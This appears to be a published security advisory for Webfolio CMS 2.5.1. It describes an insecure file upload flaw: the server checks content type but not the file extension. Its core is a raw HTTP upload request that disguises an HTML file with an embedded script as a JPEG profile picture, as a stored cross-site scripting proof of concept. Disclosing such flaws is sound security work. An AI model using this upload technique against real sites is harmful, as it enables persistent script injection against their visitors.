Webfolio CMS version 2.5.1 suffers from an insecure file upload vulnerability.
89b7b64d987ea801fc593ca99caa022a573667c732c049a833b14739d428551f# Exploit Title: Insecure File Upload in webfolio2.5.1
# Date:04 august 2015
# Exploit Author: Sharankumar somana
# Vendor Homepage: http://webfolio-cms.sourceforge.net/
# Software Link: http://sourceforge.net/projects/webfolio-cms/?source=typ_redirect
# Version: 2.5.1
# Tested on: Windows 7
_________________________________________________________________________________________________________________________
Insecure File Upload
Webfolio cms is vulnerable for insecure file upload vulnerability.The applictaion checks for the size and content type of the files while uploading, however it fails to check the extention of the uploaded files. A malicious user can successfully upload a valid image file with javascript embedded in it and changing the extention to html. An attacker can take advantage of this issue to perform persistent cross site scripting attacks.
Raw Request:
POST /webfolio/wfcms2/admin/users/edit/1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://localhost/webfolio/wfcms2/admin/users/edit/1
Cookie: PHPSESSID=fp7drdbohoi5v1ni242iuoq303;
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17740215416001
Content-Length: 123677
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[username]"
admin
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[password]"
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[passwdConfirm]"
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[email]"
sharan@gmail.com
-----------------------------17740215416001
Content-Disposition: form-data; name="UserAccountInfo[role]"
10
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[realName]"
sharan
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[aboutText]"
testing 123
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[dateOfBirth]"
1990-08-04
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture]"; filename="test.html"
Content-Type: image/jpeg
Valid image file data followed by javascript code
<html>
<script>alert(1)</script>
</html>
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[picture][current_file_name]"
php1678_55bfc11748cdf.html
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[timeZone]"
UTC
-----------------------------17740215416001
Content-Disposition: form-data; name="UserProfile[website]"
-----------------------------17740215416001
Content-Disposition: form-data; name="_csrf"
af184c6a94f8485fae50c8e5bc320695
-----------------------------17740215416001
Content-Disposition: form-data; name="btnSave"
Save changes
-----------------------------17740215416001--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed